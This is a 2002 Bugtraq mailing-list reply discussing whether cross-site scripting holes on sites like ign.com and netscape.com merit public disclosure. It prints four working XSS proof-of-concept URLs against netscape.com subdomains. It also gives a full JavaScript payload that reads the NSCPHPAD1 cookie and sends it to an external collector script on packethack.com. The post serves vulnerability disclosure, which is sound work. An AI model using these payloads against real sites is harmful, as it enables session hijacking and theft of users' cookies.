Bugtraq mailing list archives

Re: CSS -> ign.com


From: Blake Frantz <blake () mc net>
Date: Wed, 6 Feb 2002 22:30:08 -0600 (CST)



I think it's important to notify the public about CSS vulnerabilities when
a certain threshold of severity is reached.  Who decides what is severe?
That probably falls in the lap of the list moderator. I've found quite a
few of these vulnerabilities but most of them are, in my mind,
insignificant.  Most of the sites I have found vulnerabilities in don't
store anything sensitive in cookies, aren't used as a public forum (message
board), don't authenticate users, or they simply aren't "mainstream"
enough.  In these cases it's enough to send the admins of such domains an
email and move on.

With this in mind, a few weeks ago I found four CSS vulnerabilities in
netscape.com:

http://pfquotes.netscape.com/finance/quotes/quotes.tmpl?symbol=&apos;);alert('test
http://search.netscape.com/search.psp?search=";><script>alert('test')</script>
http://yp.netscape.com/setlocation.adp?addressloc=";><script>alert('test')</script>
http://webcenter.newssearch.netscape.com/aolns_search.adp?query=";><script>alert('test')</script>

and constructed a URL that demonstrates theft of my.netscape.com cookies.

Set up a my.netscape.com account, then go here:

<IMPORTANT NOTE>
This will send the contents of your cookie to packethack.com simply to
display the contents of your cookie and to demonstrate how cookies can be
sent to remote servers.
</IMPORTANT NOTE>

http://search.netscape.com/search.psp?search=";><script>function gcv(os){var 
endstr=document.cookie.indexOf("/",os);if(endstr==-1)endstr=document.cookie.length;return 
unescape(document.cookie.substring(os,endstr));}function gc(n){var arg=n%2B"=";var alen=arg.length;var 
clen=document.cookie.length;var i=0;while(i<clen){var j=i%2Balen;if(document.cookie.substring(i,j)==arg)return 
gcv(j);i=document.cookie.indexOf(" ",i)%2B1;if(i==0)break;}return 
null;}window.document.location.href="http://www.packethack.com/cgi-bin/css_snarf.pl?val="%2Bgc('NSCPHPAD1');</script>

I have noticed that the cookie name occasionally changes from NSCPHPAD1 so
you may need to play with that.

Netscape was contacted about this a while ago but I never received a
response.  Now, is this important enough to send to bugtraq?  I guess I'll
find out in the AM.

-Blake

On Tue, 5 Feb 2002, Knud Erik Højgaard wrote:

To add to the late plethora of CSS bugs, ign.com has some too. 

'Vendor' contacted about a week ago at various mail addresses, no reply.

Visiting
http://mediaviewer.ign.com/mediaPage.jsp?object_id=15984&media_type=P&ign_section=17&adtag=network%3Dign%26site%3Dps2viewer%26adchannel%3Dps2%26pagetype%3Darticle&page_title=knud+fighter+4

will show you some screenshots from 'knud fighter 4' (really virtua fighter 4 shots).. the &page_title=blabla doesn't 
filter <tags> so it's possible to steal cookies and whatnot.. I haven't tried in the members section, since I can't 
really access it without an account, but I assume it uses the same files since ps2.ign.com/pc.ign.com/pocket.ign.com 
all utilize mediaviewer.ign.com/mediaPage.jsp for their media (p)reviews.

random thought: is bugtraq really the correct place for css bugs? many vulnerable scripts are 'homemade' .. so it's 
not like there's much value in reporting 'site x has css bug in blah.php' ..

-Knud
